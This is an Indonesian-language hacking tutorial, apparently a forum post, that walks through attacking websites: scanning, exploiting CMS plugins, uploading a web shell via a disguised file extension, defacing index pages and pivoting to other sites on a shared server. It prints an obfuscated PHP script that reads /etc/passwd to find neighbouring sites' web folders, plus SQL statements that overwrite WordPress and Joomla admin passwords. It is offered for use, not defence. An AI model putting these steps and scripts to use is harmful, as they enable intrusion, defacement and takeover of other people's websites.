Alur Web Attack


Pada hari ini saya akan posting alur web attack buat yang mau blajar silahkan BelajarBelajar
1. Scan

Cari tau dimana letak kelemahaan web target. bisa di scan  pakai beberapa tool scanner. diantaranya yang paling terkenal  :
         #Acunetix (Windows)
         # Nikto  (Linux)
Selain bisa mendapatkan bug kita juga bisa mengumpulkan informasi berguna dari web target

2. XPL / SQLi

Setelah menemukan data dari web target . kita coba cari cara untuk meng-exploitasi  bug bug  yang sudah kita temukan dengan tool scanner tadi . dibawah ini daftar situ yang menyediakan macam" exploit  :
      #Exploit Database
      #Packet Strom
      #Injector
      #Hackown

apabila target menggunakan css joomla / wordpress, kita dapat mencari exploit untuk plugin-plugin yang digunakan web target . karena dengan tool scanner di atas kita diberikan informasi seakan-akan web target sudah di bedah keseluruhaanya. jadi kita tau isi folder dari web target , termasuk plugin-plugin apa saja yang digunakan .

Kalau tekni SQL dapat dilihat dari sini

Ebook beserta source website untuk praktek tenik sql download  disini

3. Upload Shell

website sudah bisa di exploitasi dan kita sudah bisa masuk ke halaman admin . sekarang kita tinggal upload sheel sekarang :

-Upload shell di wordpress bisa mengupload plugin or theme yang sudah di sisipi file shell
-Upload Shell di joomla juga sama, cuma  bisa juga menggunakan plugin Ninja Exploit
-Upload shell di CMS biasa bisa melalui upload gambar  , kalau tidak bisa coba shell"nya di rename menjadi shell.php.jpg lalu upload .

Setelah shell berhasil di upload tinggal di panggil letak URL shell"nya dimana.

4.Deface or Jumping

Kalau mau gaya" (Deface) ,cari file index.php atau semacamnya lalu rubah didalam dengan script deface yang kita punya . buat yang malas bikin script deface dapat menggunakan tool DefaceMaker. coba archive website yang sudah kita deface ke situs ini :

#Indonesia Defacer
#Magelang Cyber
#Zona-H

Tidak cukup hanya bisa men-deface satu web saja. coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface...
caranya....

Script jumping ;
Code:

$x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72";
($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('Error: Safe Mode is On');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die(' Error : Can Not Read Config Of Server '); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33 c\157\154\157\x72\x3d\x54\x65\141\x6c>\x20\123\x65\x72\166\145\x72 \x4a\x75\155\160in\x67\x20\x46\x69\x6ed\145\162 \126er\x73ion\x201.\x30\x20<\057f\157\x6et\x3e<\x2f\x62\x3e<\142\x72\040\x2f\x3e";echo "";echo "\074\142\162\x20\057\076";echo "<\142>\x3c\146o\156t\x20\146\141\x63\145=V\145\x72\144\141\x6ea \x73\x69z\x65=\062\076\104ed\x69\143\141\164\x65\144\x20\124o\x20H\141c\x6b\145\​162-\103\151\x73\141\x64\141\x6e\x65\x2e\x4fr\147\x20<\x2f\146\157n\164\076\074\x2f\142><\x62\x72 \x2f>";echo "\x3c\x66o\x6e\164\040f\141\143e\x3d\126\x65\162\x64\141n\x61\040\163\151z\x65\x3​d\x32\040\x63\157l\157\162\075\x4d\x61ro\157\156>\040\124ha\156ks\x20To\x20#\x20\104\145v\151\x6c\172c\060\x64\x65 \043\040\110\141c\x6be\x72\040\116e\167\x62\x69\145\x20\x23 \130\103\x6f\x64\145 \043 \112a\163a\153om \x23\x20\105\143h\x6f\040\043\040\x59\103L\x20#\x20\x49\x6e\144\x6fn\145sia\x6e\​x20\103\x79b\x65r \x23\040\x61\x6ed\040\x61l\x6c\x20Hack\x65\x72\040F\157\162\x75\155\040\111\x​6e In\144o\x6ee\x73\x69\141 <\057\x66\x6f\x6e\x74\x3e<\x62r /\x3e";echo "\x3c\x62r /\x3e";echo "\x2a\052\052*\052\x2a\x2a**\052\052\052\x2a***\x2a*\x2a\052\x2a\x2a**\052\x2a​*\x2a\052\052\052\052**\052***\x2a*\x2a*\x2a\052*<\x2f\146\157\156t\076\x3c\142r\x20/>";while(!$x16($x0c)){$x11 = $x17($x0c);if ($x10 > 35){$x12 = $x1c($x11,':');$x13 = $x1d($x11,0,$x12);$x14 = '/home/'.$x13.'/public_html/';if (($x13 != '')){if ($x1a($x14)){$x15($x0e,$x13);$x15($x0d,$x14);echo "\x3c\x66on\164\x20f\141\x63\x65\x3dVe\162da\156\141\x20\163\x69ze\0752\040co\154​\x6f\x72=\x52\145\x64\x3e[F\x6f\x75\156d\x20\041\135 $x14\074/\x66\157n\x74\x3e";echo "<\142\x72/\x3e";}}}$x10++;}echo "\074\x66on\x74 \146\141ce\075\x56e\x72\x64\141\x6e\141\040\x73\151z\x65\075\062 \x63\x6flo\162\x3d\124\145\x61\154\076\x2a\x2a\x2a\052\x2a*\052\052*\x2a\052*\x2​a*\052\x2a*\052**\052*\x2a**\052\x2a\x2a**\052*\052\x2a\052\x2a\052**\052**\x2a\​x2a\052";

?>



-Upload Script Jumping
-Rename jadi jumpingfinder.php
-Panggil Letak URL tersebut
-Masuk ke Public_html web target
-Masuk ke Mysql (Cari account Mysql di file config)
-Cari table User
-Update password Admin

#Wordpress


PHP Code:
UPDATE `note_wrdp1`.`wp_usersSET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1


#Joomla

PHP Code:
update `jos_usersset `password`="ece4f1e9e99fe6ca77c100d02cf4aa60" where `username`="admin"


5.Rooting
Muntah Capek Tidur